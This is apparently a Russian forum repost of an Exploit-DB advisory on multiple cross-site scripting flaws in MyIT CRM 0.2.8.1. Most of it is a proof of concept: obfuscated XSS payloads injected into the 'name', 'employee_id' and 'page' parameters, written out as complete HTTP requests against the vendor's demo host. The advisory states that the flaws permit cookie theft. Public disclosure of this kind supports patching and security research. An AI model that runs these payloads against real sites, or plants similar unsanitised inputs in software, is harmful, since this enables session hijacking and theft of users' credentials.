- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 34392
- Проверка EDB
-
- Пройдено
- Автор
- JUAN MANUEL GARCIA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-08-02
MyIT CRM - 'index.php' Multiple Cross-Site Scripting Vulnerabilities
Код:
source: https://www.securityfocus.com/bid/42140/info
MyIT CRM is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
MyIT CRM 0.2.8.1 is vulnerable; other versions may also be affected.
Proof of Concept:
http://XXX.XXX.XXX.XXX/index.php?page=employees:main&page_title=View%20Employees
* The parameter 'name' in the POST request has been set to:
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(36078)>
POST /?page=employees:main HTTP/1.0
Cookie: PHPSESSID=5460a3d8ab4f72cc624e1a6744f5ecfd
Content-Length: 159
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
name=>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
3x70;%26%23x74;%26%23x3a;alert(36078)>&submit=Search
* The parameter 'employee_id' in the GET request has been set to:
>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;
%26%23x70;%26%23x74;%26%23x3a;alert(55255)>
GET /?page=employees:employee_details&employee_id=>"'><img%20src%3D%26%23x6a;
%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%2
3x70;%26%23x74;%26%23x3a;alert(55255)> HTTP/1.0
Cookie: PHPSESSID=4b54d326030a5967e44f5719747a7c86
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Referer: http://demo.myitcrm.com/?page=employees:main
* The parameter 'page' in the POST request has been set to:
>%22%27><img%20src%3d%22javascript:alert(35665)%22>
POST /?page=>%22%27><img%20src%3d%22javascript:alert(35665)%22> HTTP/1.0
Cookie: PHPSESSID=b639ec20245375dcf4b1c3f25dfdf20f
Content-Length: 19
Accept: */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)
Host: demo.myitcrm.com
Content-Type: application/x-www-form-urlencoded
Referer: http://demo.myitcrm.com/index.php?page=employees:main&page_title=View%20Employees
name=&submit=Search
- Источник
- www.exploit-db.com